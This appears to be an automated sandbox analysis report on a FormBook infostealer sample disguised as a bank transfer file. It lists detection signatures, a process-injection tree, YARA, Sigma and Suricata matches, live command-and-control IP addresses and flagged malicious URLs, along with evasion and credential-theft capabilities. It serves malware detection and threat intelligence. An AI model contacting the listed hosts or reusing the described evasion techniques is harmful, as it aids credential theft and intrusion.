Edit tour

Windows Analysis Report
Transferencia 6997900002017937.exe

Overview

General Information

Sample name:	Transferencia 6997900002017937.exe
Analysis ID:	1635985
MD5:	adf0f9c5a51b00e8d788332183365288
SHA1:	ca1acb7362ed6f77cc0ed8df8cd81b9b2da9f246
SHA256:	a98fd5a2796bc155f99c637fd39feb1e67465a43889d478582f193aeb9b2695a
Tags:	exeFormbookPaymentuser-cocaman
Infos:

Detection

FormBook

Score:	100
Range:	0 - 100
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected FormBook

Binary is likely a compiled AutoIt script file

Found direct / indirect Syscall (likely to bypass EDR)

Joe Sandbox ML detected suspicious sample

Maps a DLL or memory area into another process

Modifies the context of a thread in another process (thread injection)

Performs DNS queries to domains with low reputation

Queues an APC in another process (thread injection)

Switches to a custom stack to bypass stack traces

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Writes to foreign memory regions

Checks if the current process is being debugged

Contains functionality for execution timing, often used to detect debuggers

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to block mouse and keyboard input (often used to hinder debugging)

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Contains functionality to communicate with device drivers

Contains functionality to dynamically determine API calls

Contains functionality to execute programs as a different user

Contains functionality to launch a process as a different user

Contains functionality to launch a program with higher privileges

Contains functionality to modify clipboard data

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Contains functionality to read the PEB

Contains functionality to read the clipboard data

Contains functionality to retrieve information about pressed keystrokes

Contains functionality to shutdown / reboot the system

Contains functionality to simulate keystroke presses

Contains functionality to simulate mouse events

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Extensive use of GetProcAddress (often used to hide API calls)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found evasive API chain (date check)

Found inlined nop instructions (likely shell or obfuscated code)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

IP address seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

OS version to string mapping found (often used in BOTs)

Potential key logger detected (key state polling based)

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: Uncommon Svchost Parent Process

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

System is w10x64

Transferencia 6997900002017937.exe (PID: 6676 cmdline: "C:\Users\user\Desktop\Transferencia 6997900002017937.exe" MD5: ADF0F9C5A51B00E8D788332183365288)

svchost.exe (PID: 6812 cmdline: "C:\Users\user\Desktop\Transferencia 6997900002017937.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)

6tskSK4rGcXjRtb8E.exe (PID: 7400 cmdline: "C:\Program Files (x86)\cXTWaLdKbfpKPnjjnWkieUOpXJMJOWyxFFspyzxzbJbrUQVDdphPePgmATUntXiyoJFFZXqhkRmoOrI\1rqpgLFC5Jsk.exe" MD5: 9C98D1A23EFAF1B156A130CEA7D2EE3A)

msfeedssync.exe (PID: 1460 cmdline: "C:\Windows\SysWOW64\msfeedssync.exe" MD5: E1C1AB8118F67D856FD140FB7175BF13)

6tskSK4rGcXjRtb8E.exe (PID: 1812 cmdline: "C:\Program Files (x86)\cXTWaLdKbfpKPnjjnWkieUOpXJMJOWyxFFspyzxzbJbrUQVDdphPePgmATUntXiyoJFFZXqhkRmoOrI\pu5Pjgh0jdA.exe" MD5: 9C98D1A23EFAF1B156A130CEA7D2EE3A)

firefox.exe (PID: 3316 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Formbook, Formbo	FormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.	SWEED Cobalt	http://blog.inquest.net/blog/2018/06/22/a-look-at-formbook-stealer/ http://cambuz.blogspot.de/2016/06/form-grabber-2016-cromeffoperathunderbi.html http://www.vkremez.com/2018/01/lets-learn-dissecting-formbook.html https://0xmrmagnezi.github.io/malware%20analysis/FormBook/ https://any.run/cybersecurity-blog/xloader-formbook-encryption-analysis-and-malware-decryption/	https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Yara Signatures

Memory Dumps

Source	Rule	Description	Author
00000007.00000002.3850615861.0000000004C70000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000006.00000002.3848322186.0000000003130000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000006.00000002.3847177486.0000000002C00000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000001.00000002.1633217878.00000000035B0000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000001.00000002.1632740851.0000000000400000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000006.00000002.3848223982.0000000003090000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000005.00000002.3848379688.00000000024C0000.00000040.00000001.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000001.00000002.1637325490.0000000003E00000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
Click to see the 3 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
1.2.svchost.exe.400000.0.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
1.2.svchost.exe.400000.0.raw.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security

Sigma Signatures

System Summary

Sigma detected: Uncommon Svchost Parent Process

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\Desktop\Transferencia 6997900002017937.exe", CommandLine: "C:\Users\user\Desktop\Transferencia 6997900002017937.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\Transferencia 6997900002017937.exe", ParentImage: C:\Users\user\Desktop\Transferencia 6997900002017937.exe, ParentProcessId: 6676, ParentProcessName: Transferencia 6997900002017937.exe, ProcessCommandLine: "C:\Users\user\Desktop\Transferencia 6997900002017937.exe", ProcessId: 6812, ProcessName: svchost.exe

Sigma detected: Windows Processes Suspicious Parent Directory

Source: Process started

Author: vburov: Data: Command: "C:\Users\user\Desktop\Transferencia 6997900002017937.exe", CommandLine: "C:\Users\user\Desktop\Transferencia 6997900002017937.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\Transferencia 6997900002017937.exe", ParentImage: C:\Users\user\Desktop\Transferencia 6997900002017937.exe, ParentProcessId: 6676, ParentProcessName: Transferencia 6997900002017937.exe, ProcessCommandLine: "C:\Users\user\Desktop\Transferencia 6997900002017937.exe", ProcessId: 6812, ProcessName: svchost.exe

Suricata Signatures

ET MALWARE FormBook CnC Checkin (GET) M5

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-12T09:30:59.284465+0100	2050745	1	Malware Command and Control Activity Detected	192.168.2.5	49717	148.72.247.70	80	TCP
2025-03-12T09:31:22.738099+0100	2050745	1	Malware Command and Control Activity Detected	192.168.2.5	49722	46.30.211.38	80	TCP
2025-03-12T09:31:37.196010+0100	2050745	1	Malware Command and Control Activity Detected	192.168.2.5	49726	47.83.1.90	80	TCP
2025-03-12T09:32:13.551452+0100	2050745	1	Malware Command and Control Activity Detected	192.168.2.5	49730	149.104.184.87	80	TCP
2025-03-12T09:32:26.852878+0100	2050745	1	Malware Command and Control Activity Detected	192.168.2.5	49734	209.74.64.58	80	TCP
2025-03-12T09:32:40.287469+0100	2050745	1	Malware Command and Control Activity Detected	192.168.2.5	49738	199.59.243.228	80	TCP
2025-03-12T09:32:56.470926+0100	2050745	1	Malware Command and Control Activity Detected	192.168.2.5	49742	13.248.169.48	80	TCP
2025-03-12T09:33:10.653086+0100	2050745	1	Malware Command and Control Activity Detected	192.168.2.5	49746	47.83.1.90	80	TCP
2025-03-12T09:33:23.999020+0100	2050745	1	Malware Command and Control Activity Detected	192.168.2.5	49750	104.21.96.1	80	TCP
2025-03-12T09:33:38.185166+0100	2050745	1	Malware Command and Control Activity Detected	192.168.2.5	49754	13.248.169.48	80	TCP
2025-03-12T09:33:51.630093+0100	2050745	1	Malware Command and Control Activity Detected	192.168.2.5	49758	103.106.67.112	80	TCP
2025-03-12T09:34:04.822723+0100	2050745	1	Malware Command and Control Activity Detected	192.168.2.5	49762	13.248.169.48	80	TCP
2025-03-12T09:34:18.232355+0100	2050745	1	Malware Command and Control Activity Detected	192.168.2.5	49766	144.76.229.203	80	TCP

ETPRO MALWARE Common Downloader Header Pattern UH

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-12T09:30:09.798064+0100	2803274	2	Potentially Bad Traffic	192.168.2.5	49710	104.26.13.205	443	TCP

ETPRO MALWARE FormBook CnC Checkin (GET) M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-12T09:30:59.284465+0100	2855465	1	A Network Trojan was detected	192.168.2.5	49717	148.72.247.70	80	TCP
2025-03-12T09:31:22.738099+0100	2855465	1	A Network Trojan was detected	192.168.2.5	49722	46.30.211.38	80	TCP
2025-03-12T09:31:37.196010+0100	2855465	1	A Network Trojan was detected	192.168.2.5	49726	47.83.1.90	80	TCP
2025-03-12T09:32:13.551452+0100	2855465	1	A Network Trojan was detected	192.168.2.5	49730	149.104.184.87	80	TCP
2025-03-12T09:32:26.852878+0100	2855465	1	A Network Trojan was detected	192.168.2.5	49734	209.74.64.58	80	TCP
2025-03-12T09:32:40.287469+0100	2855465	1	A Network Trojan was detected	192.168.2.5	49738	199.59.243.228	80	TCP
2025-03-12T09:32:56.470926+0100	2855465	1	A Network Trojan was detected	192.168.2.5	49742	13.248.169.48	80	TCP
2025-03-12T09:33:10.653086+0100	2855465	1	A Network Trojan was detected	192.168.2.5	49746	47.83.1.90	80	TCP
2025-03-12T09:33:23.999020+0100	2855465	1	A Network Trojan was detected	192.168.2.5	49750	104.21.96.1	80	TCP
2025-03-12T09:33:38.185166+0100	2855465	1	A Network Trojan was detected	192.168.2.5	49754	13.248.169.48	80	TCP
2025-03-12T09:33:51.630093+0100	2855465	1	A Network Trojan was detected	192.168.2.5	49758	103.106.67.112	80	TCP
2025-03-12T09:34:04.822723+0100	2855465	1	A Network Trojan was detected	192.168.2.5	49762	13.248.169.48	80	TCP
2025-03-12T09:34:18.232355+0100	2855465	1	A Network Trojan was detected	192.168.2.5	49766	144.76.229.203	80	TCP

ETPRO MALWARE FormBook CnC Checkin (POST) M3

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-12T09:30:13.003457+0100	2855464	1	A Network Trojan was detected	192.168.2.5	49769	13.248.169.48	80	TCP
2025-03-12T09:31:14.979100+0100	2855464	1	A Network Trojan was detected	192.168.2.5	49719	46.30.211.38	80	TCP
2025-03-12T09:31:17.523989+0100	2855464	1	A Network Trojan was detected	192.168.2.5	49720	46.30.211.38	80	TCP
2025-03-12T09:31:20.117502+0100	2855464	1	A Network Trojan was detected	192.168.2.5	49721	46.30.211.38	80	TCP
2025-03-12T09:31:29.300935+0100	2855464	1	A Network Trojan was detected	192.168.2.5	49723	47.83.1.90	80	TCP
2025-03-12T09:31:31.746340+0100	2855464	1	A Network Trojan was detected	192.168.2.5	49724	47.83.1.90	80	TCP
2025-03-12T09:31:34.343811+0100	2855464	1	A Network Trojan was detected	192.168.2.5	49725	47.83.1.90	80	TCP
2025-03-12T09:31:46.051034+0100	2855464	1	A Network Trojan was detected	192.168.2.5	49727	149.104.184.87	80	TCP
2025-03-12T09:31:48.597995+0100	2855464	1	A Network Trojan was detected	192.168.2.5	49728	149.104.184.87	80	TCP
2025-03-12T09:31:51.146109+0100	2855464	1	A Network Trojan was detected	192.168.2.5	49729	149.104.184.87	80	TCP
2025-03-12T09:32:19.204930+0100	2855464	1	A Network Trojan was detected	192.168.2.5	49731	209.74.64.58	80	TCP
2025-03-12T09:32:21.742223+0100	2855464	1	A Network Trojan was detected	192.168.2.5	49732	209.74.64.58	80	TCP
2025-03-12T09:32:24.319615+0100	2855464	1	A Network Trojan was detected	192.168.2.5	49733	209.74.64.58	80	TCP
2025-03-12T09:32:32.627566+0100	2855464	1	A Network Trojan was detected	192.168.2.5	49735	199.59.243.228	80	TCP
2025-03-12T09:32:35.171237+0100	2855464	1	A Network Trojan was detected	192.168.2.5	49736	199.59.243.228	80	TCP
2025-03-12T09:32:37.726777+0100	2855464	1	A Network Trojan was detected	192.168.2.5	49737	199.59.243.228	80	TCP
2025-03-12T09:32:45.798729+0100	2855464	1	A Network Trojan was detected	192.168.2.5	49739	13.248.169.48	80	TCP
2025-03-12T09:32:49.426651+0100	2855464	1	A Network Trojan was detected	192.168.2.5	49740	13.248.169.48	80	TCP
2025-03-12T09:32:50.910532+0100	2855464	1	A Network Trojan was detected	192.168.2.5	49741	13.248.169.48	80	TCP
2025-03-12T09:33:02.990062+0100	2855464	1	A Network Trojan was detected	192.168.2.5	49743	47.83.1.90	80	TCP
2025-03-12T09:33:05.584487+0100	2855464	1	A Network Trojan was detected	192.168.2.5	49744	47.83.1.90	80	TCP
2025-03-12T09:33:08.192434+0100	2855464	1	A Network Trojan was detected	192.168.2.5	49745	47.83.1.90	80	TCP
2025-03-12T09:33:16.198799+0100	2855464	1	A Network Trojan was detected	192.168.2.5	49747	104.21.96.1	80	TCP
2025-03-12T09:33:18.732351+0100	2855464	1	A Network Trojan was detected	192.168.2.5	49748	104.21.96.1	80	TCP
2025-03-12T09:33:21.486244+0100	2855464	1	A Network Trojan was detected	192.168.2.5	49749	104.21.96.1	80	TCP
2025-03-12T09:33:29.488458+0100	2855464	1	A Network Trojan was detected	192.168.2.5	49751	13.248.169.48	80	TCP
2025-03-12T09:33:32.060988+0100	2855464	1	A Network Trojan was detected	192.168.2.5	49752	13.248.169.48	80	TCP
2025-03-12T09:33:35.645534+0100	2855464	1	A Network Trojan was detected	192.168.2.5	49753	13.248.169.48	80	TCP
2025-03-12T09:33:43.954746+0100	2855464	1	A Network Trojan was detected	192.168.2.5	49755	103.106.67.112	80	TCP
2025-03-12T09:33:46.515153+0100	2855464	1	A Network Trojan was detected	192.168.2.5	49756	103.106.67.112	80	TCP
2025-03-12T09:33:49.050034+0100	2855464	1	A Network Trojan was detected	192.168.2.5	49757	103.106.67.112	80	TCP
2025-03-12T09:33:57.174516+0100	2855464	1	A Network Trojan was detected	192.168.2.5	49759	13.248.169.48	80	TCP
2025-03-12T09:33:59.709385+0100	2855464	1	A Network Trojan was detected	192.168.2.5	49760	13.248.169.48	80	TCP
2025-03-12T09:34:02.271033+0100	2855464	1	A Network Trojan was detected	192.168.2.5	49761	13.248.169.48	80	TCP
2025-03-12T09:34:10.548867+0100	2855464	1	A Network Trojan was detected	192.168.2.5	49763	144.76.229.203	80	TCP
2025-03-12T09:34:13.089060+0100	2855464	1	A Network Trojan was detected	192.168.2.5	49764	144.76.229.203	80	TCP
2025-03-12T09:34:15.641978+0100	2855464	1	A Network Trojan was detected	192.168.2.5	49765	144.76.229.203	80	TCP
2025-03-12T09:34:23.898040+0100	2855464	1	A Network Trojan was detected	192.168.2.5	49767	13.248.169.48	80	TCP
2025-03-12T09:34:26.456345+0100	2855464	1	A Network Trojan was detected	192.168.2.5	49768	13.248.169.48	80	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: Transferencia 6997900002017937.exe

Avira: detected

Antivirus detection for URL or domain

Source: http://www.askvtwv8.top/uztg/	Avira URL Cloud: Label: malware
Source: http://www.zkkv3oae.vip/bl60/	Avira URL Cloud: Label: malware
Source: http://www.zkkv3oae.vip/bl60/?Oj=7KqBeI51pekf0AVUSicAI1mJWWXcRARBaI0jAhY/A6pzh5mI8UIGMoQN96TYM7FYKU4GVIyckkKWvlHhgwmaHPqmLD6kIg0NjZ1aLNIABKKmXMt1XCsrqxVg/Xx9J2iGFQ==&5D6d=cV08QN8xl6	Avira URL Cloud: Label: malware
Source: http://www.askvtwv8.top/uztg/?Oj=+nnD4c3c3KEL/rpdey5PpuGEtusQHjNHKRoYtOqDasD0Qg1/WG/4NRhjA5miSBE9J8NC1pB0d1xeGfzelhsRyS28cJZ/vafQpLasO5iZ9LFZmh+6HbDBwHQ9RpNaYIgqLw==&5D6d=cV08QN8xl6	Avira URL Cloud: Label: malware

Multi AV Scanner detection for submitted file

Source: Transferencia 6997900002017937.exe	Virustotal: Detection: 50%			Perma Link
Source: Transferencia 6997900002017937.exe	ReversingLabs: Detection: 52%

Yara detected FormBook

Source: Yara match	File source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000007.00000002.3850615861.0000000004C70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.3848322186.0000000003130000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.3847177486.0000000002C00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.1633217878.00000000035B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.1632740851.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.3848223982.0000000003090000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.3848379688.00000000024C0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.1637325490.0000000003E00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

Joe Sandbox ML detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Source: Transferencia 6997900002017937.exe

Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source:	Binary string: msfeedssync.pdbUGP source: svchost.exe, 00000001.00000002.1633012882.0000000003019000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1632987071.0000000003000000.00000004.00000020.00020000.00000000.sdmp, 6tskSK4rGcXjRtb8E.exe, 00000005.00000002.3847876995.0000000000B9E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdbUGP source: Transferencia 6997900002017937.exe, 00000000.00000003.1375671292.0000000003830000.00000004.00001000.00020000.00000000.sdmp, Transferencia 6997900002017937.exe, 00000000.00000003.1374758468.0000000003640000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1633259152.0000000003700000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1633259152.000000000389E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1532513784.0000000003300000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1534649917.0000000003500000.00000004.00000020.00020000.00000000.sdmp, msfeedssync.exe, 00000006.00000002.3848498428.000000000347E000.00000040.00001000.00020000.00000000.sdmp, msfeedssync.exe, 00000006.00000003.1640685653.0000000003134000.00000004.00000020.00020000.00000000.sdmp, msfeedssync.exe, 00000006.00000002.3848498428.00000000032E0000.00000040.00001000.00020000.00000000.sdmp, msfeedssync.exe, 00000006.00000003.1632711486.0000000002F68000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: Transferencia 6997900002017937.exe, 00000000.00000003.1375671292.0000000003830000.00000004.00001000.00020000.00000000.sdmp, Transferencia 6997900002017937.exe, 00000000.00000003.1374758468.0000000003640000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000001.00000002.1633259152.0000000003700000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1633259152.000000000389E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1532513784.0000000003300000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1534649917.0000000003500000.00000004.00000020.00020000.00000000.sdmp, msfeedssync.exe, msfeedssync.exe, 00000006.00000002.3848498428.000000000347E000.00000040.00001000.00020000.00000000.sdmp, msfeedssync.exe, 00000006.00000003.1640685653.0000000003134000.00000004.00000020.00020000.00000000.sdmp, msfeedssync.exe, 00000006.00000002.3848498428.00000000032E0000.00000040.00001000.00020000.00000000.sdmp, msfeedssync.exe, 00000006.00000003.1632711486.0000000002F68000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: msfeedssync.pdb source: svchost.exe, 00000001.00000002.1633012882.0000000003019000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1632987071.0000000003000000.00000004.00000020.00020000.00000000.sdmp, 6tskSK4rGcXjRtb8E.exe, 00000005.00000002.3847876995.0000000000B9E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: svchost.pdb source: msfeedssync.exe, 00000006.00000002.3849269128.000000000390C000.00000004.10000000.00040000.00000000.sdmp, msfeedssync.exe, 00000006.00000002.3847343312.0000000002E32000.00000004.00000020.00020000.00000000.sdmp, 6tskSK4rGcXjRtb8E.exe, 00000007.00000000.1708461860.000000000283C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.1936549559.000000003CC8C000.00000004.80000000.00040000.00000000.sdmp
Source:	Binary string: svchost.pdbUGP source: msfeedssync.exe, 00000006.00000002.3849269128.000000000390C000.00000004.10000000.00040000.00000000.sdmp, msfeedssync.exe, 00000006.00000002.3847343312.0000000002E32000.00000004.00000020.00020000.00000000.sdmp, 6tskSK4rGcXjRtb8E.exe, 00000007.00000000.1708461860.000000000283C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.1936549559.000000003CC8C000.00000004.80000000.00040000.00000000.sdmp
Source:	Binary string: C:\Work\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: 6tskSK4rGcXjRtb8E.exe, 00000005.00000002.3847777276.00000000009CF000.00000002.00000001.01000000.00000005.sdmp, 6tskSK4rGcXjRtb8E.exe, 00000007.00000000.1708130909.00000000009CF000.00000002.00000001.01000000.00000005.sdmp

Source: C:\Users\user\Desktop\Transferencia 6997900002017937.exe	Code function: 0_2_0069445A GetFileAttributesW,FindFirstFileW,FindClose,	0_2_0069445A
Source: C:\Users\user\Desktop\Transferencia 6997900002017937.exe	Code function: 0_2_0069C6D1 FindFirstFileW,FindClose,	0_2_0069C6D1
Source: C:\Users\user\Desktop\Transferencia 6997900002017937.exe	Code function: 0_2_0069C75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,	0_2_0069C75C
Source: C:\Users\user\Desktop\Transferencia 6997900002017937.exe	Code function: 0_2_0069EF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_0069EF95
Source: C:\Users\user\Desktop\Transferencia 6997900002017937.exe	Code function: 0_2_0069F0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_0069F0F2
Source: C:\Users\user\Desktop\Transferencia 6997900002017937.exe	Code function: 0_2_0069F3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,	0_2_0069F3F3
Source: C:\Users\user\Desktop\Transferencia 6997900002017937.exe	Code function: 0_2_006937EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_006937EF
Source: C:\Users\user\Desktop\Transferencia 6997900002017937.exe	Code function: 0_2_00693B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_00693B12
Source: C:\Users\user\Desktop\Transferencia 6997900002017937.exe	Code function: 0_2_0069BCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,	0_2_0069BCBC
Source: C:\Windows\SysWOW64\msfeedssync.exe	Code function: 6_2_02C1C680 FindFirstFileW,FindNextFileW,FindClose,	6_2_02C1C680

Source: C:\Windows\SysWOW64\msfeedssync.exe	Code function: 4x nop then xor eax, eax		6_2_02C09EC0
Source: C:\Windows\SysWOW64\msfeedssync.exe	Code function: 4x nop then mov ebx, 00000004h		6_2_032204E8

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49721 -> 46.30.211.38:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49740 -> 13.248.169.48:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49744 -> 47.83.1.90:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:49717 -> 148.72.247.70:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49717 -> 148.72.247.70:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49745 -> 47.83.1.90:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49743 -> 47.83.1.90:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49736 -> 199.59.243.228:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49725 -> 47.83.1.90:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49753 -> 13.248.169.48:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49727 -> 149.104.184.87:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:49722 -> 46.30.211.38:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49722 -> 46.30.211.38:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49731 -> 209.74.64.58:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49719 -> 46.30.211.38:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49728 -> 149.104.184.87:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49767 -> 13.248.169.48:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49724 -> 47.83.1.90:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49720 -> 46.30.211.38:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49732 -> 209.74.64.58:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:49742 -> 13.248.169.48:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:49734 -> 209.74.64.58:80
